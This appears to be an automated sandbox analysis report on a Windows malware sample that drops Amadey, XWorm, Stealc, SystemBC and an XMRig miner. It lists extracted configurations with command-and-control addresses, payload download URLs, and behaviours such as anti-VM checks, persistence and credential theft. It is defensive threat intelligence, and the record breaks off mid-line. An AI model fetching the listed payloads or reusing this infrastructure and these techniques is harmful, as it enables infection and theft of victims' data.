Analysis
-
max time kernel
127s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2025, 22:36
Static task
static1
Behavioral task
behavioral1
Sample
001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe
Resource
win10v2004-20250217-en
General
-
Target
001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe
-
Size
3.0MB
-
MD5
9b74c8ca9a96ae492548c64b4bbe9545
-
SHA1
8ba7902250c9df14180a431392e69b83def8f4b9
-
SHA256
001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066
-
SHA512
7a40393008880d161373981cea7fd5642315ce06621f67ee12d1b429c8ae52300a7923d0e51aded072656342476f1e82a9c28eb808d4148212cce59b81dea596
-
SSDEEP
49152:BZWS4fAqWkqxaVUxWz22HcS99o+PBzVewkIZYNCVmzU8l5:eSUAqWkqxaVUxWC2LHvHZYs4zUE
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
xworm
5.0
45.154.98.175:6969
uGmGtmYAbzOi1F41
-
Install_directory
%AppData%
-
install_file
google_updates.exe
Extracted
systembc
towerbingobongoboom.com
62.60.226.86
-
dns
5.132.191.104
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023ca3-220.dat family_xworm behavioral2/memory/4360-233-0x00000000004E0000-0x00000000004F0000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/464-668-0x00000000009D0000-0x0000000000E42000-memory.dmp healer behavioral2/memory/464-665-0x00000000009D0000-0x0000000000E42000-memory.dmp healer behavioral2/memory/464-1104-0x00000000009D0000-0x0000000000E42000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Stealc family
-
Systembc family
-
Xmrig family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 17 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ mcsq.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b26b6bfdcd.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 339a55ae62.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5e644351a1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 83c5f6f0d5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 31107e887f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 09a5b3d3db.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b945d3c333.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ vertualiziren.exe -
XMRig Miner payload 15 IoCs
resource yara_rule behavioral2/memory/1940-200-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp xmrig behavioral2/memory/1940-201-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp xmrig behavioral2/memory/1940-209-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp xmrig behavioral2/memory/1940-213-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp xmrig behavioral2/memory/1940-214-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp xmrig behavioral2/memory/1940-215-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp xmrig behavioral2/memory/1940-211-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp xmrig behavioral2/memory/1940-212-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp xmrig behavioral2/memory/1940-235-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp xmrig behavioral2/memory/1940-308-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp xmrig behavioral2/memory/1940-411-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp xmrig behavioral2/memory/1940-447-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp xmrig behavioral2/memory/1940-518-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp xmrig behavioral2/memory/1940-525-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp xmrig behavioral2/memory/1940-526-0x00007FF73D5E0000-0x00007FF73DEA4000-memory.dmp xmrig -
Blocklisted process makes network request 3 IoCs
flow pid Process 48 5036 powershell.exe 114 4624 powershell.exe 120 2084 powershell.exe -
pid Process 116 powershell.exe 3632 powershell.exe 1352 powershell.exe 1588 powershell.exe 5036 powershell.exe 4624 powershell.exe 2084 powershell.exe 5036 powershell.exe -
Downloads MZ/PE file 18 IoCs
flow pid Process 47 2668 rapes.exe 88 2668 rapes.exe 105 2668 rapes.exe 105 2668 rapes.exe 105 2668 rapes.exe 105 2668 rapes.exe 105 2668 rapes.exe 105 2668 rapes.exe 105 2668 rapes.exe 105 2668 rapes.exe 105 2668 rapes.exe 37 1664 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe 96 4924 Gxtuum.exe 114 4624 powershell.exe 169 3204 83c5f6f0d5.exe 129 1036 BitLockerToGo.exe 154 1456 BitLockerToGo.exe 120 2084 powershell.exe -
Uses browser remote debugging 2 TTPs 1 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2632 chrome.exe -
Checks BIOS information in registry 2 TTPs 34 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 339a55ae62.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 339a55ae62.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vertualiziren.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 09a5b3d3db.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b945d3c333.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5e644351a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b26b6bfdcd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b26b6bfdcd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mcsq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5e644351a1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 31107e887f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 83c5f6f0d5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 83c5f6f0d5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 09a5b3d3db.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b945d3c333.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vertualiziren.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 31107e887f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mcsq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation PcAIvJ0.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation nhDLtPT.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation Gxtuum.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation dll32.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 3 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk cnntXtU.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk cnntXtU.exe -
Executes dropped EXE 28 IoCs
pid Process 1660 J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe 2668 rapes.exe 1620 PcAIvJ0.exe 2996 rapes.exe 2036 ktxzLhN.exe 4264 dll32.exe 5036 nhDLtPT.exe 4924 Gxtuum.exe 2256 vertualiziren.exe 3236 31107e887f.exe 4360 cnntXtU.exe 2972 3277ecaa2a.exe 3884 TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE 4596 09a5b3d3db.exe 3480 tempdatalogger.exe 1584 c03b939485.exe 1588 c03b939485.exe 4564 483d2fa8a0d53818306efeb32d3.exe 4372 b945d3c333.exe 916 339a55ae62.exe 652 rapes.exe 1160 mcsq.exe 3632 Gxtuum.exe 3204 83c5f6f0d5.exe 3780 5e644351a1.exe 3768 RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe 1840 8c305bd773.exe 464 b26b6bfdcd.exe -
Identifies Wine through registry keys 2 TTPs 17 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine vertualiziren.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine b26b6bfdcd.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 09a5b3d3db.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine b945d3c333.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine mcsq.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 83c5f6f0d5.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 31107e887f.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 339a55ae62.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 5e644351a1.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe -
Loads dropped DLL 2 IoCs
pid Process 4264 dll32.exe 3480 tempdatalogger.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\83c5f6f0d5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107500101\\83c5f6f0d5.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e644351a1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107510101\\5e644351a1.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8c305bd773.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107520101\\8c305bd773.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" cnntXtU.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3277ecaa2a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\3277ecaa2a.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 117 raw.githubusercontent.com 284 raw.githubusercontent.com 85 pastebin.com 86 pastebin.com 90 raw.githubusercontent.com 91 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 163 ip-api.com -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023ca6-248.dat autoit_exe behavioral2/files/0x0005000000023277-610.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 7 IoCs
pid Process 1972 tasklist.exe 1520 tasklist.exe 4160 tasklist.exe 4516 tasklist.exe 4836 tasklist.exe 3300 tasklist.exe 5728 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
pid Process 1664 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe 1660 J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe 2668 rapes.exe 2996 rapes.exe 2256 vertualiziren.exe 3236 31107e887f.exe 3884 TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE 4596 09a5b3d3db.exe 4564 483d2fa8a0d53818306efeb32d3.exe 4372 b945d3c333.exe 916 339a55ae62.exe 652 rapes.exe 1160 mcsq.exe 3204 83c5f6f0d5.exe 3780 5e644351a1.exe 3768 RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe 464 b26b6bfdcd.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 3432 set thread context of 1940 3432 Explorer.EXE 119 PID 1584 set thread context of 1588 1584 c03b939485.exe 158 PID 4596 set thread context of 1036 4596 09a5b3d3db.exe 163 PID 4372 set thread context of 1456 4372 b945d3c333.exe 171 -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe File created C:\Windows\Tasks\Gxtuum.job nhDLtPT.exe File created C:\Windows\Tasks\Test Task17.job vertualiziren.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1796 1584 WerFault.exe 157 -
System Location Discovery: System Language Discovery 1 TTPs 45 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 83c5f6f0d5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b26b6bfdcd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 8c305bd773.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3277ecaa2a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 09a5b3d3db.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vertualiziren.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c03b939485.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 339a55ae62.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5e644351a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nhDLtPT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c03b939485.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8c305bd773.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 8c305bd773.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 31107e887f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b945d3c333.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mcsq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 4876 timeout.exe 4996 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 4272 taskkill.exe 3872 taskkill.exe 2924 taskkill.exe 4928 taskkill.exe 4596 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4640 schtasks.exe 4020 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1664 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe 1664 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe 1664 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe 1664 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe 1664 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe 1664 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe 1660 J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe 1660 J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe 2668 rapes.exe 2668 rapes.exe 5036 powershell.exe 5036 powershell.exe 5036 powershell.exe 116 powershell.exe 116 powershell.exe 116 powershell.exe 116 powershell.exe 2996 rapes.exe 2996 rapes.exe 2036 ktxzLhN.exe 2036 ktxzLhN.exe 2036 ktxzLhN.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 4264 dll32.exe 2256 vertualiziren.exe 2256 vertualiziren.exe 3236 31107e887f.exe 3236 31107e887f.exe 3236 31107e887f.exe 3236 31107e887f.exe 3236 31107e887f.exe 3236 31107e887f.exe 3432 Explorer.EXE 3432 Explorer.EXE 4360 cnntXtU.exe 4360 cnntXtU.exe 4624 powershell.exe 4624 powershell.exe 4624 powershell.exe 3884 TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE 3884 TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE 3632 powershell.exe 3632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5036 powershell.exe Token: SeDebugPrivilege 116 powershell.exe Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeDebugPrivilege 2036 ktxzLhN.exe Token: SeDebugPrivilege 4264 dll32.exe Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeLockMemoryPrivilege 1940 notepad.exe Token: SeLockMemoryPrivilege 1940 notepad.exe Token: SeDebugPrivilege 4360 cnntXtU.exe Token: SeDebugPrivilege 1972 tasklist.exe Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: 